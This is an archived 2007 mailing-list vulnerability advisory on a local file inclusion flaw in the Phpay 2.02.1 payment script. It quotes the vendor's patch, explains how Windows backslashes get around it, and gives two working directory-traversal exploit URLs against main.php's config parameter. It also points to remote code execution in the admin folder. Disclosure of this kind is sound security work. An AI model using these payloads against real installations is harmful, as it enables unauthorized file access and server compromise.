|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
th3.r00k.nospam
pork.gmail.com
Date: Fri Dec 14 2007 - 16:03:52 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
By Michael Brooks
Vulnerability Type:Local File Inclusion
Software: Phpay
Homepage:http://sourceforge.net/projects/phpay/
Version Affected:2.02.1
Phpay has been affected by multiple local file include flaws, as a result this patch was written:
$config = ereg_replace(":","", $config);
$config = trim(ereg_replace("../","", $config));
$config = trim(ereg_replace("/","", $config));
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}
require("./$config");
To bypass this patch backslashes can be used instead of forward slashes on windows systems.
Also .inc.php must exists *somewhere* in the string.
Local File Include for windows only:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
or if magic_quotes_gpc is turned on:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess
Remote code execution is accessible in the ./admin/ folder.
The admin folder *should* be protected by a .htaccess file similar to osCommerce2.
Vulnerable configuration:
A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue.
Merry Christmas
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]